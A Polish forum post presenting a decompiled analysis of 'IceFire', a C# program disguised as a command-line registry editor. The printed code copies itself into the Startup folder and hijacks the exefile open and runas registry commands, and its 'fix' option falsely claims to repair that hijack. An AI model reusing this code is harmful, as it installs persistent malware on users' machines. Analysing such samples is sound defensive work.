25.08.2011, 18:05
Napisałem do xylitola o analizę, odpisał mi, że ten plik korzysta z .NET, i analiza:
Kod:
internal class VMain
{
// Fields
private static bool beEvil = true;
private static RegistryKey def = Registry.ClassesRoot;
private static string gene = (!beEvil ? "\"%1\" %*" : ("\"" + Assembly.GetExecutingAssembly().GetName().CodeBase.Substring(8) + "\" %*"));
private static string[] nuke = new string[] { @"exefile\shell\open\command", @"exefile\shell\runas\command", @"exefile\shell\open\command", @"exefile\shell\runas\command" };
private static RegistryKey[] nukePos = new RegistryKey[] { Registry.ClassesRoot, Registry.ClassesRoot, Registry.ClassesRoot, Registry.ClassesRoot };
private static object[] nukeRep = new object[] { gene, gene, gene, gene };
private static string[] nukeVal = new string[] { "IsolatedCommand", "IsolatedCommand", "", "" };
private static RegistryKey reg = def;
// Methods
private static void Crawl()
{
string str = Console.ReadLine();
if (str.ToLower() == "back")
{
reg = def;
}
else if ((str.Length >= 3) && (str.Substring(0, 3) == "all"))
{
if (str.Length == 3)
{
str = "all ";
}
foreach (string str2 in reg.GetSubKeyNames())
{
if ((str2.Length >= (str.Length - 4)) && (str2.Substring(0, str.Length - 4) == str.Substring(4)))
{
Console.WriteLine(str2);
}
}
}
else if ((str.Length >= 3) && (str.Substring(0, 3) == "set"))
{
string[] strArray2 = str.Split(new char[] { char.Parse("|") });
reg.SetValue(strArray2[1], strArray2[2]);
}
else
{
if ((str.Length >= "fix".Length) && (str == "fix"))
{
RegEdit();
Console.WriteLine("Re-set exe run arguements.");
}
else if (str == "about")
{
Console.WriteLine("This is a simple command-line regedit by chc4, because he got bored one day.");
Console.WriteLine("It is written in C#, terribly inefficient, and I have no idea why you would use");
Console.WriteLine("this over regedit.exe");
Console.WriteLine("-8/23/2011");
}
else if (str == "help")
{
Console.WriteLine("back - Returns you to the Classes Root directory.");
Console.WriteLine("all [sub] - Searches the current directory for sub.");
Console.WriteLine("set|value|newvalue - Sets the value of the key ''value'' in the current directory.");
Console.WriteLine("fix - Re-sets standard exefile run arguments, for those nasty rogues.");
Console.WriteLine("help - Display this message.");
Console.WriteLine("Anything else will do a search for the queury in the current directory, if found will goto new directory.");
}
foreach (string str3 in reg.GetSubKeyNames())
{
if ((str3.Length >= str.Length) && (str3.Substring(0, str.Length) == str))
{
reg = reg.OpenSubKey(str3, true);
return;
}
}
}
}
private static void doEvil()
{
if (beEvil && !File.Exists(@"C:\Users\" + WindowsIdentity.GetCurrent().Name.Split(new char[] { ''\\'' })[1] + @"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\icef.exe"))
{
File.Copy(Assembly.GetExecutingAssembly().GetName().CodeBase.Substring(8), @"C:\Users\" + WindowsIdentity.GetCurrent().Name.Split(new char[] { ''\\'' })[1] + @"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\icef.exe", true);
RegEdit();
}
}
private static void LoopBack()
{
Console.WriteLine(">" + reg.Name);
Crawl();
Console.WriteLine("--------------------");
LoopBack();
}
public static void Main(string[] arg)
{
Console.Title = "IceFire (cmdLine regedit, chc4)";
try
{
Registry.ClassesRoot.OpenSubKey("exefile", true);
doEvil();
LoopBack();
}
catch (SecurityException)
{
Console.WriteLine("Please run as Administrator.");
Console.ReadLine();
Process.GetCurrentProcess().Close();
}
catch (Exception exception)
{
Console.WriteLine("Error:" + exception.Message + exception.ToString());
Console.ReadLine();
Process.GetCurrentProcess().Close();
}
}
private static void RegEdit()
{
for (int i = 0; i < nuke.Length; i++)
{
nukePos[i].OpenSubKey(nuke[i], true).SetValue(nukeVal[i], nukeRep[i]);
}
}
}
Collapse Methods
KIS/EIS/MKS, MBAM, HitmanPro, Eset Online, WF+uBlock